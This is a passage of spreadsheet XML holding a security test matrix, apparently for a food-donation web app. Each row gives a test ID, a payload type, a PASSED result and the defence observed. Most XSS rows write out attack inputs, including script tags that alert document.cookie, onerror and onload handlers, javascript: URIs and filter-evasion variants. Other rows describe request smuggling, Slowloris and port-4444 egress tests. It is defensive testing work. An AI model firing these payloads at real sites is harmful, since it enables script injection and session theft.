      </c>
      <c r="B180" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C180" s="16" t="inlineStr">
        <is>
          <t>HTTP Request Smuggling Defense</t>
        </is>
      </c>
      <c r="D180" s="16" t="inlineStr">
        <is>
          <t>Send HTTP request with conflicting Content-Length and Transfer-Encoding headers</t>
        </is>
      </c>
      <c r="E180" s="16" t="inlineStr">
        <is>
          <t>HTTP Smuggling payload</t>
        </is>
      </c>
      <c r="F180" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G180" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H180" s="16" t="inlineStr">
        <is>
          <t>Reverse proxy normalizes HTTP headers; Smuggling attempts rejected with 400</t>
        </is>
      </c>
    </row>
    <row r="181" ht="22" customHeight="1">
      <c r="A181" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-020</t>
        </is>
      </c>
      <c r="B181" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C181" s="16" t="inlineStr">
        <is>
          <t>Slowloris / Slow HTTP Headers DoS Defense</t>
        </is>
      </c>
      <c r="D181" s="16" t="inlineStr">
        <is>
          <t>Send HTTP headers 1 byte at a time every 10 seconds</t>
        </is>
      </c>
      <c r="E181" s="16" t="inlineStr">
        <is>
          <t>Slowloris attack simulation</t>
        </is>
      </c>
      <c r="F181" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G181" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H181" s="16" t="inlineStr">
        <is>
          <t>Server enforces connection header timeout (10s); Hanging connections dropped</t>
        </is>
      </c>
    </row>
    <row r="182" ht="22" customHeight="1">
      <c r="A182" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-021</t>
        </is>
      </c>
      <c r="B182" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C182" s="16" t="inlineStr">
        <is>
          <t>Large Payload DoS Protection</t>
        </is>
      </c>
      <c r="D182" s="16" t="inlineStr">
        <is>
          <t>Send 50MB HTTP POST request body</t>
        </is>
      </c>
      <c r="E182" s="16" t="inlineStr">
        <is>
          <t>Massive payload</t>
        </is>
      </c>
      <c r="F182" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G182" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H182" s="16" t="inlineStr">
        <is>
          <t>Body parser enforces payload limit (1MB max); 413 Payload Too Large</t>
        </is>
      </c>
    </row>
    <row r="183" ht="22" customHeight="1">
      <c r="A183" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-022</t>
        </is>
      </c>
      <c r="B183" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C183" s="16" t="inlineStr">
        <is>
          <t>Cookie Prefix Security Enforcement</t>
        </is>
      </c>
      <c r="D183" s="16" t="inlineStr">
        <is>
          <t>Inspect cookies for __Host- and __Secure- prefixes</t>
        </is>
      </c>
      <c r="E183" s="16" t="inlineStr">
        <is>
          <t>Cookie prefix audit</t>
        </is>
      </c>
      <c r="F183" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G183" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H183" s="16" t="inlineStr">
        <is>
          <t>__Host- cookie prefix used for critical session tokens</t>
        </is>
      </c>
    </row>
    <row r="184" ht="22" customHeight="1">
      <c r="A184" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-023</t>
        </is>
      </c>
      <c r="B184" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C184" s="16" t="inlineStr">
        <is>
          <t>DNSSEC Protocol Verification</t>
        </is>
      </c>
      <c r="D184" s="16" t="inlineStr">
        <is>
          <t>Validate domain DNS Security Extensions configuration</t>
        </is>
      </c>
      <c r="E184" s="16" t="inlineStr">
        <is>
          <t>DNSSEC audit</t>
        </is>
      </c>
      <c r="F184" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G184" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H184" s="16" t="inlineStr">
        <is>
          <t>DNSSEC signatures valid; Prevents DNS spoofing / cache poisoning</t>
        </is>
      </c>
    </row>
    <row r="185" ht="22" customHeight="1">
      <c r="A185" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-024</t>
        </is>
      </c>
      <c r="B185" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C185" s="16" t="inlineStr">
        <is>
          <t>Subresource Integrity (SRI) Attribute Enforcement</t>
        </is>
      </c>
      <c r="D185" s="16" t="inlineStr">
        <is>
          <t>Inspect HTML &lt;script&gt; tags loading CDN scripts</t>
        </is>
      </c>
      <c r="E185" s="16" t="inlineStr">
        <is>
          <t>SRI Attribute audit</t>
        </is>
      </c>
      <c r="F185" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G185" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H185" s="16" t="inlineStr">
        <is>
          <t>SRI integrity hashes (sha384-...) configured on external scripts</t>
        </is>
      </c>
    </row>
    <row r="186" ht="22" customHeight="1">
      <c r="A186" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-025</t>
        </is>
      </c>
      <c r="B186" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C186" s="16" t="inlineStr">
        <is>
          <t>Server Time Zone Standardization</t>
        </is>
      </c>
      <c r="D186" s="16" t="inlineStr">
        <is>
          <t>Inspect audit log timestamp timezone format</t>
        </is>
      </c>
      <c r="E186" s="16" t="inlineStr">
        <is>
          <t>Timezone audit</t>
        </is>
      </c>
      <c r="F186" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G186" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H186" s="16" t="inlineStr">
        <is>
          <t>System logs standardized to UTC (Coordinated Universal Time)</t>
        </is>
      </c>
    </row>
    <row r="187" ht="22" customHeight="1">
      <c r="A187" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-026</t>
        </is>
      </c>
      <c r="B187" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C187" s="16" t="inlineStr">
        <is>
          <t>Automated Software Dependency Security Audit</t>
        </is>
      </c>
      <c r="D187" s="16" t="inlineStr">
        <is>
          <t>Run npm audit / pip audit scanner on codebase</t>
        </is>
      </c>
      <c r="E187" s="16" t="inlineStr">
        <is>
          <t>Dependency scanner audit</t>
        </is>
      </c>
      <c r="F187" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G187" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H187" s="16" t="inlineStr">
        <is>
          <t>0 Known Critical / High vulnerability CVEs in production dependencies</t>
        </is>
      </c>
    </row>
    <row r="188" ht="22" customHeight="1">
      <c r="A188" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-027</t>
        </is>
      </c>
      <c r="B188" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C188" s="16" t="inlineStr">
        <is>
          <t>System File Integrity Monitoring (FIM)</t>
        </is>
      </c>
      <c r="D188" s="16" t="inlineStr">
        <is>
          <t>Inspect binary file integrity monitoring agent status</t>
        </is>
      </c>
      <c r="E188" s="16" t="inlineStr">
        <is>
          <t>FIM agent status</t>
        </is>
      </c>
      <c r="F188" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G188" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H188" s="16" t="inlineStr">
        <is>
          <t>FIM active; Unauthorized modifications to system binaries trigger alerts</t>
        </is>
      </c>
    </row>
    <row r="189" ht="22" customHeight="1">
      <c r="A189" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-028</t>
        </is>
      </c>
      <c r="B189" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C189" s="16" t="inlineStr">
        <is>
          <t>Automated SSL Certificate Auto-Renewal Check</t>
        </is>
      </c>
      <c r="D189" s="16" t="inlineStr">
        <is>
          <t>Inspect certbot / ACME automated renewal timer</t>
        </is>
      </c>
      <c r="E189" s="16" t="inlineStr">
        <is>
          <t>Cert renewal timer</t>
        </is>
      </c>
      <c r="F189" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G189" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H189" s="16" t="inlineStr">
        <is>
          <t>Automated renewal scheduled 30 days prior to certificate expiration</t>
        </is>
      </c>
    </row>
    <row r="190" ht="22" customHeight="1">
      <c r="A190" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-029</t>
        </is>
      </c>
      <c r="B190" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C190" s="16" t="inlineStr">
        <is>
          <t>Process Core Dump Disablement</t>
        </is>
      </c>
      <c r="D190" s="16" t="inlineStr">
        <is>
          <t>Inspect OS core dump settings (ulimit -c)</t>
        </is>
      </c>
      <c r="E190" s="16" t="inlineStr">
        <is>
          <t>Core dump audit</t>
        </is>
      </c>
      <c r="F190" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G190" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H190" s="16" t="inlineStr">
        <is>
          <t>Core dumps disabled (ulimit -c 0); Prevents memory secret extraction</t>
        </is>
      </c>
    </row>
    <row r="191" ht="22" customHeight="1">
      <c r="A191" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-030</t>
        </is>
      </c>
      <c r="B191" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C191" s="16" t="inlineStr">
        <is>
          <t>Outbound Egress Network Filtering</t>
        </is>
      </c>
      <c r="D191" s="16" t="inlineStr">
        <is>
          <t>Attempt outbound TCP connection from backend to unknown IP on port 4444</t>
        </is>
      </c>
      <c r="E191" s="16" t="inlineStr">
        <is>
          <t>Egress network scan</t>
        </is>
      </c>
      <c r="F191" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G191" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H191" s="16" t="inlineStr">
        <is>
          <t>Egress firewall rules restrict outbound traffic to whitelisted endpoints</t>
        </is>
      </c>
    </row>
    <row r="192" ht="22" customHeight="1">
      <c r="A192" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-001</t>
        </is>
      </c>
      <c r="B192" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C192" s="16" t="inlineStr">
        <is>
          <t>Reflected XSS in Search Query Input</t>
        </is>
      </c>
      <c r="D192" s="16" t="inlineStr">
        <is>
          <t>Input &lt;script&gt;alert(document.cookie)&lt;/script&gt; into search field</t>
        </is>
      </c>
      <c r="E192" s="16" t="inlineStr">
        <is>
          <t>Reflected XSS payload</t>
        </is>
      </c>
      <c r="F192" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G192" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H192" s="16" t="inlineStr">
        <is>
          <t>HTML entity encoded before rendering; Output displays literally &amp;lt;script&amp;gt;</t>
        </is>
      </c>
    </row>
    <row r="193" ht="22" customHeight="1">
      <c r="A193" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-002</t>
        </is>
      </c>
      <c r="B193" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C193" s="16" t="inlineStr">
        <is>
          <t>Reflected XSS via URL Parameter</t>
        </is>
      </c>
      <c r="D193" s="16" t="inlineStr">
        <is>
          <t>Navigate to /donations?category=&lt;img src=x onerror=alert(1)&gt;</t>
        </is>
      </c>
      <c r="E193" s="16" t="inlineStr">
        <is>
          <t>URL XSS payload</t>
        </is>
      </c>
      <c r="F193" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G193" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H193" s="16" t="inlineStr">
        <is>
          <t>Framework auto-escapes URL query parameters in React components</t>
        </is>
      </c>
    </row>
    <row r="194" ht="22" customHeight="1">
      <c r="A194" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-003</t>
        </is>
      </c>
      <c r="B194" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C194" s="16" t="inlineStr">
        <is>
          <t>Stored XSS in User Profile Organization Name</t>
        </is>
      </c>
      <c r="D194" s="16" t="inlineStr">
        <is>
          <t>Set profile name to &lt;svg/onload=alert(1)&gt;</t>
        </is>
      </c>
      <c r="E194" s="16" t="inlineStr">
        <is>
          <t>Stored XSS payload</t>
        </is>
      </c>
      <c r="F194" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G194" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H194" s="16" t="inlineStr">
        <is>
          <t>Input sanitized using DOMPurify; Encoded safely in DOM tree</t>
        </is>
      </c>
    </row>
    <row r="195" ht="22" customHeight="1">
      <c r="A195" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-004</t>
        </is>
      </c>
      <c r="B195" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C195" s="16" t="inlineStr">
        <is>
          <t>Stored XSS in Donation Description Field</t>
        </is>
      </c>
      <c r="D195" s="16" t="inlineStr">
        <is>
          <t>Post food donation with description &lt;body onload=alert('XSS')&gt;</t>
        </is>
      </c>
      <c r="E195" s="16" t="inlineStr">
        <is>
          <t>Stored XSS in text area</t>
        </is>
      </c>
      <c r="F195" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G195" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H195" s="16" t="inlineStr">
        <is>
          <t>HTML markup stripped / sanitized; No script execution occurs</t>
        </is>
      </c>
    </row>
    <row r="196" ht="22" customHeight="1">
      <c r="A196" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-005</t>
        </is>
      </c>
      <c r="B196" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C196" s="16" t="inlineStr">
        <is>
          <t>DOM-based XSS via location.hash</t>
        </is>
      </c>
      <c r="D196" s="16" t="inlineStr">
        <is>
          <t>Navigate to /dashboard#&lt;img src=x onerror=javascript:alert(1)&gt;</t>
        </is>
      </c>
      <c r="E196" s="16" t="inlineStr">
        <is>
          <t>DOM XSS location.hash</t>
        </is>
      </c>
      <c r="F196" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G196" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H196" s="16" t="inlineStr">
        <is>
          <t>Client-side router parses hash safely without innerHTML assignment</t>
        </is>
      </c>
    </row>
    <row r="197" ht="22" customHeight="1">
      <c r="A197" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-006</t>
        </is>
      </c>
      <c r="B197" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C197" s="16" t="inlineStr">
        <is>
          <t>DOM-based XSS via document.referrer</t>
        </is>
      </c>
      <c r="D197" s="16" t="inlineStr">
        <is>
          <t>Set document.referrer payload and read in client script</t>
        </is>
      </c>
      <c r="E197" s="16" t="inlineStr">
        <is>
          <t>DOM XSS referrer</t>
        </is>
      </c>
      <c r="F197" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G197" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H197" s="16" t="inlineStr">
        <is>
          <t>Referrer string sanitized prior to DOM insertion</t>
        </is>
      </c>
    </row>
    <row r="198" ht="22" customHeight="1">
      <c r="A198" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-007</t>
        </is>
      </c>
      <c r="B198" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C198" s="16" t="inlineStr">
        <is>
          <t>XSS Payload in User Registration Name</t>
        </is>
      </c>
      <c r="D198" s="16" t="inlineStr">
        <is>
          <t>Register user with name '"&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;</t>
        </is>
      </c>
      <c r="E198" s="16" t="inlineStr">
        <is>
          <t>Registration XSS payload</t>
        </is>
      </c>
      <c r="F198" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G198" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H198" s="16" t="inlineStr">
        <is>
          <t>Input validation rejects script tags; Output sanitized</t>
        </is>
      </c>
    </row>
    <row r="199" ht="22" customHeight="1">
      <c r="A199" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-008</t>
        </is>
      </c>
      <c r="B199" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C199" s="16" t="inlineStr">
        <is>
          <t>XSS in HTTP User-Agent Log Viewer</t>
        </is>
      </c>
      <c r="D199" s="16" t="inlineStr">
        <is>
          <t>Set User-Agent header to &lt;script&gt;alert(1)&lt;/script&gt; and view admin logs</t>
        </is>
      </c>
      <c r="E199" s="16" t="inlineStr">
        <is>
          <t>Header XSS payload</t>
        </is>
      </c>
      <c r="F199" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G199" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H199" s="16" t="inlineStr">
        <is>
          <t>Admin log dashboard escapes log output before rendering HTML</t>
        </is>
      </c>
    </row>
    <row r="200" ht="22" customHeight="1">
      <c r="A200" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-009</t>
        </is>
      </c>
      <c r="B200" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C200" s="16" t="inlineStr">
        <is>
          <t>XSS via SVG Image Upload</t>
        </is>
      </c>
      <c r="D200" s="16" t="inlineStr">
        <is>
          <t>Upload SVG containing &lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
        </is>
      </c>
      <c r="E200" s="16" t="inlineStr">
        <is>
          <t>SVG Script payload</t>
        </is>
      </c>
      <c r="F200" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G200" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H200" s="16" t="inlineStr">
        <is>
          <t>SVG sanitized or served with Content-Disposition: attachment header</t>
        </is>
      </c>
    </row>
    <row r="201" ht="22" customHeight="1">
      <c r="A201" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-010</t>
        </is>
      </c>
      <c r="B201" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C201" s="16" t="inlineStr">
        <is>
          <t>XSS via Markdown / Rich Text Editor</t>
        </is>
      </c>
      <c r="D201" s="16" t="inlineStr">
        <is>
          <t>Input [clickme](javascript:alert(1)) in Markdown field</t>
        </is>
      </c>
      <c r="E201" s="16" t="inlineStr">
        <is>
          <t>Markdown XSS payload</t>
        </is>
      </c>
      <c r="F201" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G201" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H201" s="16" t="inlineStr">
        <is>
          <t>Markdown parser configured with sanitize: true; javascript: URIs stripped</t>
        </is>
      </c>
    </row>
    <row r="202" ht="22" customHeight="1">
      <c r="A202" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-011</t>
        </is>
      </c>
      <c r="B202" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C202" s="16" t="inlineStr">
        <is>
          <t>XSS via JSON Response Injection</t>
        </is>
      </c>
      <c r="D202" s="16" t="inlineStr">
        <is>
          <t>Inject HTML script tag in API JSON response payload</t>
        </is>
      </c>
      <c r="E202" s="16" t="inlineStr">
        <is>
          <t>JSON XSS payload</t>
        </is>
      </c>
      <c r="F202" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G202" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H202" s="16" t="inlineStr">
        <is>
          <t>Content-Type header set to application/json; Browser refrains from HTML parsing</t>
        </is>
      </c>
    </row>
    <row r="203" ht="22" customHeight="1">
      <c r="A203" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-012</t>
        </is>
      </c>
      <c r="B203" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C203" s="16" t="inlineStr">
        <is>
          <t>XSS in Email Template Generation</t>
        </is>
      </c>
      <c r="D203" s="16" t="inlineStr">
        <is>
          <t>Pass XSS payload as user name into automated email notification</t>
        </is>
      </c>
      <c r="E203" s="16" t="inlineStr">
        <is>
          <t>Email XSS payload</t>
        </is>
      </c>
      <c r="F203" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G203" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H203" s="16" t="inlineStr">
        <is>
          <t>Email template generator escapes all dynamic string parameters</t>
        </is>
      </c>
    </row>
    <row r="204" ht="22" customHeight="1">
      <c r="A204" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-013</t>
        </is>
      </c>
      <c r="B204" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C204" s="16" t="inlineStr">
        <is>
          <t>XSS via Attribute Injection</t>
        </is>
      </c>
      <c r="D204" s="16" t="inlineStr">
        <is>
          <t>Set profile website field to " onfocus="alert(1)</t>
        </is>
      </c>
      <c r="E204" s="16" t="inlineStr">
        <is>
          <t>Attribute injection payload</t>
        </is>
      </c>
      <c r="F204" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G204" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H204" s="16" t="inlineStr">
        <is>
          <t>Attributes enclosed in quotes and HTML entity escaped</t>
        </is>
      </c>
    </row>
    <row r="205" ht="22" customHeight="1">
      <c r="A205" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-014</t>
        </is>
      </c>
      <c r="B205" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C205" s="16" t="inlineStr">
        <is>
          <t>XSS in Error Message Display</t>
        </is>
      </c>
      <c r="D205" s="16" t="inlineStr">
        <is>
          <t>Trigger error with custom payload message Parameter=&lt;script&gt;alert(1)&lt;/script&gt;</t>
        </is>
      </c>
      <c r="E205" s="16" t="inlineStr">
        <is>
          <t>Error XSS payload</t>
        </is>
      </c>
      <c r="F205" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G205" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H205" s="16" t="inlineStr">
        <is>
          <t>Error modal renders message text content safely via textContent</t>
        </is>
      </c>
    </row>
    <row r="206" ht="22" customHeight="1">
      <c r="A206" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-015</t>
        </is>
      </c>
      <c r="B206" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C206" s="16" t="inlineStr">
        <is>
          <t>XSS via CSS Style Attribute Injection</t>
        </is>
      </c>
      <c r="D206" s="16" t="inlineStr">
        <is>
          <t>Inject style="background:url('javascript:alert(1)')" into input</t>
        </is>
      </c>
      <c r="E206" s="16" t="inlineStr">
        <is>
          <t>CSS XSS payload</t>
        </is>
      </c>
      <c r="F206" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G206" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H206" s="16" t="inlineStr">
        <is>
          <t>Inline style attributes sanitized / prohibited by CSP policy</t>
        </is>
      </c>
    </row>
    <row r="207" ht="22" customHeight="1">
      <c r="A207" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-016</t>
        </is>
      </c>
      <c r="B207" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C207" s="16" t="inlineStr">
        <is>
          <t>XSS Filter Evasion via Hex / Unicode Encoding</t>
        </is>
      </c>
      <c r="D207" s="16" t="inlineStr">
        <is>
          <t>Inject \u003cscript\u003ealert(1)\u003c/script\u003e</t>
        </is>
      </c>
      <c r="E207" s="16" t="inlineStr">
        <is>
          <t>Encoded XSS payload</t>
        </is>
      </c>
      <c r="F207" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G207" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H207" s="16" t="inlineStr">
        <is>
          <t>Decoded input sanitized prior to rendering in template</t>
        </is>
      </c>
    </row>
    <row r="208" ht="22" customHeight="1">
      <c r="A208" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-017</t>
        </is>
      </c>
      <c r="B208" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C208" s="16" t="inlineStr">
        <is>
          <t>XSS Filter Evasion via Mixed Case Tags</t>
        </is>
      </c>
      <c r="D208" s="16" t="inlineStr">
        <is>
          <t>Inject &lt;sCrIpT&gt;alert(1)&lt;/ScRiPt&gt;</t>
        </is>
      </c>
      <c r="E208" s="16" t="inlineStr">
        <is>
          <t>Mixed case XSS payload</t>
        </is>
      </c>
      <c r="F208" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G208" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H208" s="16" t="inlineStr">
        <is>
          <t>Case-insensitive sanitization filter strips all script variations</t>
        </is>
      </c>
    </row>
    <row r="209" ht="22" customHeight="1">
      <c r="A209" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-018</t>
        </is>
      </c>
      <c r="B209" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C209" s="16" t="inlineStr">
        <is>
          <t>XSS Filter Evasion via Null Byte Injection</t>
        </is>
      </c>
      <c r="D209" s="16" t="inlineStr">
        <is>
          <t>Inject &lt;script%00&gt;alert(1)&lt;/script&gt;</t>
        </is>
      </c>
      <c r="E209" s="16" t="inlineStr">
        <is>
          <t>Null byte XSS payload</t>
        </is>
      </c>
      <c r="F209" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G209" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H209" s="16" t="inlineStr">
        <is>
          <t>Null bytes stripped from input during request sanitization phase</t>
        </is>
      </c>
    </row>
    <row r="210" ht="22" customHeight="1">
      <c r="A210" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-019</t>
        </is>
      </c>
      <c r="B210" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C210" s="16" t="inlineStr">
        <is>
          <t>XSS via HTML5 Data Attributes</t>
        </is>
      </c>
      <c r="D210" s="16" t="inlineStr">
        <is>
          <t>Inject data-bind="onload:alert(1)" into dynamic element</t>
        </is>
      </c>
      <c r="E210" s="16" t="inlineStr">
        <is>
          <t>Data attribute XSS</t>
        </is>
      </c>
      <c r="F210" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G210" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H210" s="16" t="inlineStr">
        <is>
          <t>Data attributes sanitized; Binding engine ignores raw scripts</t>
        </is>
      </c>
    </row>
    <row r="211" ht="22" customHeight="1">
      <c r="A211" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-020</t>
        </is>
      </c>
      <c r="B211" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C211" s="16" t="inlineStr">
        <is>
          <t>XSS via JavaScript Pseudo-Protocol</t>
        </is>
      </c>
      <c r="D211" s="16" t="inlineStr">
        <is>
